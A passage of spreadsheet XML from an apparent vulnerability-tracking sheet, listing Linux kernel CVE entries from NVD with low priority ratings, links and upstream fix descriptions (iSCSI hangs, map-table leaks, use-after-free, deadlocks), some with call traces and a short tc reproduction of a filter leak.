      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97951</t>
        </is>
      </c>
      <c r="D594" s="5" t="inlineStr"/>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="inlineStr"/>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr"/>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: target: iscsi: Fix hang for aborted WRITE_PENDING commands
When a LUN_RESET aborts a WRITE command that is in the
TRANSPORT_WRITE_PENDING state, the target core sets CMD_T_ABORTED and
waits for the frontend to finish processing.
If the initiator subsequently sends the remaining dataout PDUs,
__iscsit_check_dataout_hdr() catches the payload, stops the dataout
timer if the sequence is final and finally dumps the data.  However, the
iSCSI target doesn't trigger the completion process for these aborted
commands. Because of this, the abort path hangs indefinitely in
target_put_cmd_and_wait(), leading to a deadlocked target worker thread.
Fix this by explicitly calling target_complete_cmd() when the final
dataout PDU is received for an aborted WRITE command.
target_complete_cmd() detects the CMD_T_ABORTED flag and cleanly routes
the command into target_abort_work, allowing the abort completion to
successfully unblock.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97951</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97952</t>
        </is>
      </c>
      <c r="D595" s="5" t="inlineStr"/>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="inlineStr"/>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr"/>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunvdc: unmap LDC cookies when the descriptor send fails
__send_request() maps the request's pages into the LDC channel's map
table (ldc_map_sg()), fills in the descriptor and marks it
VIO_DESC_READY before ringing the doorbell via __vdc_tx_trigger().
When the trigger fails, the error path only prints a message: the
descriptor stays READY and the cookies are never unmapped. The
mapping is normally released in vdc_end_one() when the peer completes
the descriptor - but a descriptor whose doorbell was never sent will
never complete, and since dr-&gt;prod is not advanced on failure, the
reset path (vdc_requeue_inflight(), which walks [cons, prod)) never
visits it either. The map table entries are leaked permanently.
Since commit a11f6ca9aef9 ("sunvdc: Do not spin in an infinite loop
when vio_ldc_send() returns EAGAIN") trigger failures occur in
practice under load, so every resulting I/O error also leaks one
request's worth of entries from the fixed-size (8192 entries per
channel) map table. Because the allocator hands out contiguous
ranges, fragmentation makes large multi-segment requests fail first
as the table drains, until ldc_map_sg() fails permanently and the
disk is dead until reboot.
It also makes any retry-based recovery unusable: requeuing the
request on -EAGAIN remaps the pages on every attempt, overwriting
desc-&gt;cookies and orphaning the previous mapping, so the table
drains at the retry rate. This is the memory exhaustion observed
when the requeue approach was first tested in October 2025.
Roll back on failure: unmap the cookies, mark the descriptor FREE
again and clear the request entry. If the trigger failed with
-ENOTCONN, __vdc_tx_trigger() has already reset the port, which
tears down and reallocates both the dring and the LDC channel
including its map table - nothing to roll back, and the stale
descriptor must not be touched.</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97952</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97954</t>
        </is>
      </c>
      <c r="D596" s="5" t="inlineStr"/>
      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="inlineStr"/>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr"/>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: fix tcp stream corruption with large pages
rds_message_map_pages() assigns PAGE_SIZE bytes to every
scatterlist entry, even when total_len ends in a partial page. The RDS
congestion map is defined as 8192 bytes, so on systems with PAGE_SIZE
greater than 8192 the scatterlist maps bytes beyond the end of the
congestion map.  RDS-TCP transmits the SG contents according to those
lengths, so the extra bytes become part of the TCP RDS stream and are
interpreted as subsequent RDS message headers, corrupting the stream.
Limit the final scatterlist mapping to the number of bytes remaining.
This has no effect on systems with a 4K page size and allows RDS-TCP to
be used on systems with 16K and larger page sizes.
The RDS selftest, which previously hung on 16K pages, now passes.</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97954</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97955</t>
        </is>
      </c>
      <c r="D597" s="5" t="inlineStr"/>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="inlineStr"/>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="inlineStr"/>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr"/>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mana: restore the XDP program pointer when pre-allocation fails
mana_xdp_set() publishes the new program into apc-&gt;bpf_prog before it
allocates anything, because mana_pre_alloc_rxbufs() sizes the buffers
from it via mana_get_rxbuf_cfg(). When that allocation fails the
function returns the error directly, skipping the err_dealloc_rxbuffs
label which is the only place that restores the previous pointer.
The attach is reported as failed, so the BPF core drops the reference it
held for the caller and the program can be freed, while apc-&gt;bpf_prog
still points at it. The next consumer of mana_xdp_get() - typically
mana_chn_setxdp() from mana_alloc_queues() on the following ifup, or
after a TX timeout reset - then calls bpf_prog_add() on freed memory.
This is reachable from an ordinary "ip link set dev ethX xdp obj ..."
whenever the per-queue RX buffer pre-allocation cannot be satisfied.
Restore the previous program on that error path.</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97955</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97956</t>
        </is>
      </c>
      <c r="D598" s="5" t="inlineStr"/>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="inlineStr"/>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="inlineStr"/>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr"/>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: net_failover: Fix the deadlock in net_failover_slave_name_change()
This is a sibling fix of commit
b84c5632c7b3 ("net: net_failover: Fix the deadlock in slave register").
There is netdev_lock_ops() in the upper callers, so using netif_open()
instead of dev_open().
Call Trace:
 __schedule+0x2bb/0x650
 schedule+0x27/0xb0
 schedule_preempt_disabled+0x15/0x30
 __mutex_lock.constprop.0+0x550/0xaf0
 __mutex_lock_slowpath+0x13/0x20
 mutex_lock+0x3b/0x50
 dev_open+0x3b/0xe0
 net_failover_slave_name_change+0x22/0x40
 failover_event+0xd4/0x1e0
 notifier_call_chain+0x62/0xf0
 raw_notifier_call_chain+0x16/0x30
 call_netdevice_notifiers_info+0x50/0x80
 netif_change_name+0x200/0x330
 do_setlink.isra.0+0xb12/0xdf0
 ? security_capable+0x9a/0x1e0
 ? ns_capable+0x31/0x60
 rtnl_setlink+0x302/0x670
 ? netlink_recvmsg+0x296/0x340
 ? security_capable+0x9a/0x1e0
 ? __pfx_rtnl_setlink+0x10/0x10
 rtnetlink_rcv_msg+0x384/0x460
 ? __pfx_rtnetlink_rcv_msg+0x10/0x10
 netlink_rcv_skb+0x61/0x120
 rtnetlink_rcv+0x15/0x30
 netlink_unicast+0x28f/0x3c0
 netlink_sendmsg+0x216/0x450
 __sys_sendto+0x222/0x230
 __x64_sys_sendto+0x24/0x40
 x64_sys_call+0x1d5d/0x2390
 do_syscall_64+0x105/0x5a0
 ? do_syscall_64+0x140/0x5a0
 ? exc_page_fault+0x94/0x1e0
 entry_SYSCALL_64_after_hwframe+0x76/0x7e</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97956</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97958</t>
        </is>
      </c>
      <c r="D599" s="5" t="inlineStr"/>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="inlineStr"/>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr">
        <is>
          <t>f5, requests</t>
        </is>
      </c>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr"/>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_api: Don't replay RTM_GETCHAIN in tc_ctl_chain().
If a netlink socket sends RTM_GETCHAIN requests repeatedly
without recv()ing the responses, tc_ctl_chain() hogs CPU and
triggers Hung Task splat. [0]
As caught in the stack trace, netlink_attachskb() could confuse
tc_ctl_chain() by returning -EAGAIN when the userspace netlink
socket's receive buffer is full.
The replay: label exists since commit 32a4f5ecd738 ("net: sched:
introduce chain object to uapi") but was not used initially.
Since commit 9f407f1768d3 ("net: sched: introduce chain templates"),
the label is needed for RTM_NEWCHAIN because tcf_proto_lookup_ops()
may release RTNL to call request_module().
However, the replay logic is unnecessary for RTM_GETCHAIN.
Let's apply the replay logic only for RTM_NEWCHAIN.
[0]:
INFO: task repro:1018 is blocked on a mutex likely owned by task repro:1022.
task:repro           state:R  running task     stack:14096 pid:1022  tgid:1014  ppid:961    task_flags:0x400040 flags:0x00080000
Call Trace:
 &lt;TASK&gt;
 ? clockevents_program_event (kernel/time/clockevents.c:372)
 ? pskb_expand_head (net/core/skbuff.c:615)
 ? skb_release_data (net/core/skbuff.c:1122)
 ? netlink_attachskb (./include/linux/skbuff.h:1323 ./include/linux/skbuff.h:1332 net/netlink/af_netlink.c:1232)
 ? __netlink_lookup (./include/linux/rcupdate.h:882 ./include/linux/rhashtable.h:711 net/netlink/af_netlink.c:499)
 ? tc_chain_notify (net/sched/cls_api.c:3045)
 ? tc_chain_notify (./include/linux/skbuff.h:1384 net/sched/cls_api.c:3041)
 ? netlink_unicast (net/netlink/af_netlink.c:1335)
 ? rtnl_unicast (./include/net/netlink.h:1198 net/core/rtnetlink.c:985)
 ? tc_ctl_chain (net/sched/cls_api.c:3242)
 ? rtnetlink_rcv_msg (net/core/rtnetlink.c:7146)
 ? netlink_unicast (net/netlink/af_netlink.c:1354)
 ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:7177)
 ? netlink_rcv_skb (net/netlink/af_netlink.c:2556)
 ? netlink_unicast (net/netlink/af_netlink.c:1319)
 ? netlink_sendmsg (net/netlink/af_netlink.c:1900)
 ? __sock_sendmsg (net/socket.c:800)
 ? __sys_sendto (net/socket.c:2281)
 ? __x64_sys_sendto (net/socket.c:2288 net/socket.c:2284 net/socket.c:2284)
 ? do_syscall_64 (arch/x86/entry/syscall_64.c:61 arch/x86/entry/syscall_64.c:84)
 ? entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97958</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97959</t>
        </is>
      </c>
      <c r="D600" s="5" t="inlineStr"/>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="inlineStr"/>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr"/>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_route: free emptied bucket on filter move
route4_change can move an existing filter to a different top-level
bucket: route4_set_parms recomputes the handle from TCA_ROUTE4_TO/
FROM/IIF, and the handle-mismatch check is gated on the 'new' flag, so
for an existing filter the new handle may differ from the old one and
land in a different bucket. When this happens, the filter is unlinked
from the old bucket, but the bucket itself is never freed once it goes
empty. The stale empty bucket remains in head-&gt;table[], causing
route4_delete to report *last=false even after the last live filter is
gone. That pins the empty tcf_proto and causes a leak.
Fix this by refcounting the filters linked to a bucket and freeing the
bucket when the count drops to zero. The existing scan in route4_delete
goes away with it.
The count is updated at all sites that link or unlink a filter during add,
change and delete, and the bucket is dropped from head-&gt;table[] as soon as
it reaches zero.
Conditions to recreate the bug:
  CONFIG_NET_CLS_ROUTE4=y, CONFIG_NET_SCH_INGRESS=y, CONFIG_NET_CLS_ACT=y.
  tc qdisc replace dev lo clsact
  tc filter add dev lo ingress protocol ip pref 100 route from 1 to 1
  tc filter change dev lo ingress protocol ip pref 100 handle 0x10001 \
    route from 1 to 2
  tc filter del dev lo ingress protocol ip pref 100 handle 0x10002 \
    route from 1 to 2
  tc filter show dev lo ingress | grep -c 'pref 100 route chain 0 '</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97959</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97960</t>
        </is>
      </c>
      <c r="D601" s="5" t="inlineStr"/>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="inlineStr"/>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr"/>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/x86/intel: Prevent drain_pebs() reentry
The PEBS buffer is shared by all events on a CPU, so drain_pebs() must
not be reentered. If so, one instance may observe stale buffer state and
potentially access out-of-bound memory.
Most invocations happen in NMI context, which naturally prevents reentry.
However, drain_pebs() is also reachable from process context via
intel_pmu_drain_pebs_buffer().
In those paths, the PMU is often already disabled, but not guaranteed.
For example, __intel_pmu_pebs_disable() only disables the target counter,
so other active counters can still raise a PMI and interrupt an in-flight
drain_pebs(). Here is an example,
__perf_addr_filters_adjust()
  perf_event_stop()
    __perf_event_stop()
      x86_pmu_stop() (event-&gt;pmu-&gt;stop)
        intel_pmu_disable_event()
          intel_pmu_pebs_disable()
            __intel_pmu_pebs_disable()
              intel_pmu_drain_large_pebs()
                intel_pmu_drain_pebs_buffer()
Introduce __intel_pmu_quiesce() and __intel_pmu_resume() helpers and
use them in intel_pmu_drain_large_pebs() to disable the full PMU
around the intel_pmu_drain_pebs_buffer() call, preventing reentry.
Also add a warning in intel_pmu_drain_pebs_buffer() when the full PMU is
not disabled.</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97960</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97961</t>
        </is>
      </c>
      <c r="D602" s="5" t="inlineStr"/>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="inlineStr"/>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr"/>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/core: Allow list_del during perf_event_overflow()
A PMU might use perf_sched_cb_inc() and perf_sched_cb_dec()
interface to get the PMU call back function pmu::sched_task
invoked at schedule in and schedule out. This is achieved
by walking along the list anchored by sched_cb_list.
The following scenario might lead to a list corruption.
   perf_pmu_sched_task()
      for_each_list_entry(..., &amp;sched_cb_list)
      +--&gt; __perf_pmu_sched_task()
           +--&gt; event-&gt;pmu-&gt;sched_task())
                +--&gt; PMU_push_sample()
                     +--&gt; perf_event_overflow()
                          +--&gt; __perf_event_overflow()
                               +--&gt; pmu-&gt;stop()
                                    +--&gt; perf_sched_cb_dec()
                                         remove entry from sched_cb_list
                                         while list node in use.
This happens when ioctl(fd, PERF_EVENT_IOC_REFRESH, xxx) has been
invoked and perf_event::event_limit hits zero.
Prevent the list corruption and convert for_each_list_entry()
to for_each_list_entry_safe().</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97961</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97962</t>
        </is>
      </c>
      <c r="D603" s="5" t="inlineStr"/>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="inlineStr"/>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr"/>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Move representor vnic reporter to eswitch devlink port
The representor vnic devlink health reporter is created and destroyed
along the representor netdev (un)load path, which is not serialized by
the devlink instance lock. Destroying the reporter from there triggers
a devl_assert_locked() splat on driver unbind:
  WARNING: net/devlink/core.c:259 at devl_assert_locked+0x54/0x70, CPU#2: bash/3758
  Modules linked in: mlx5_vdpa vringh vdpa mlx5_ib mlx5_fwctl mlx5_core ...
  CPU: 2 UID: 0 PID: 3758 Comm: bash Tainted: G        W           6.19.0+ #1 PREEMPT
  Tainted: [W]=WARN
  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), ...
  RIP: 0010:devl_assert_locked+0x54/0x70
  Call Trace:
   &lt;TASK&gt;
   devl_health_reporter_destroy+0x3a/0x1b0
   mlx5e_vport_rep_unload+0x12d/0x2b0 [mlx5_core]
   mlx5_eswitch_unregister_vport_reps+0x1b8/0x220 [mlx5_core]
   ? __esw_offloads_unload_rep+0x190/0x190 [mlx5_core]
   ? kernfs_remove_by_name_ns+0xc3/0xf0
   device_release_driver_internal+0x3b2/0x560
   unbind_store+0xce/0xf0
Move the reporter's lifecycle to the eswitch devlink port (un)register
paths, which are already serialized by the devlink instance lock, and
store the handle on mlx5_devlink_port. Use the port's mlx5_vport as the
reporter priv since the diagnose callback only needs a device handle and
a vport number, and mlx5_vport carries both and is initialized before
any representor driver probes.</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97962</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97963</t>
        </is>
      </c>
      <c r="D604" s="5" t="inlineStr"/>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="inlineStr"/>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr"/>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: initialize ptp_lock at probe time
priv-&gt;ptp_lock is only initialized in stmmac_ptp_register(), which runs
during __stmmac_open(). However, the lock is also used while the
interface is down and has never been opened: tc_taprio_configure()
invokes the PTP gettime64() callback to compute the EST base time when
offloading a TAPRIO schedule, and stmmac_get_time() takes
priv-&gt;ptp_lock. Using an uninitialized rwlock is undefined behaviour.
Move the rwlock_init() to __stmmac_dvr_probe(), together with the other
private locks, so that ptp_lock is always valid regardless of the
interface state.</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97963</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97964</t>
        </is>
      </c>
      <c r="D605" s="5" t="inlineStr"/>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="inlineStr"/>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr"/>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ppp_synctty: ensure a writeable skb header
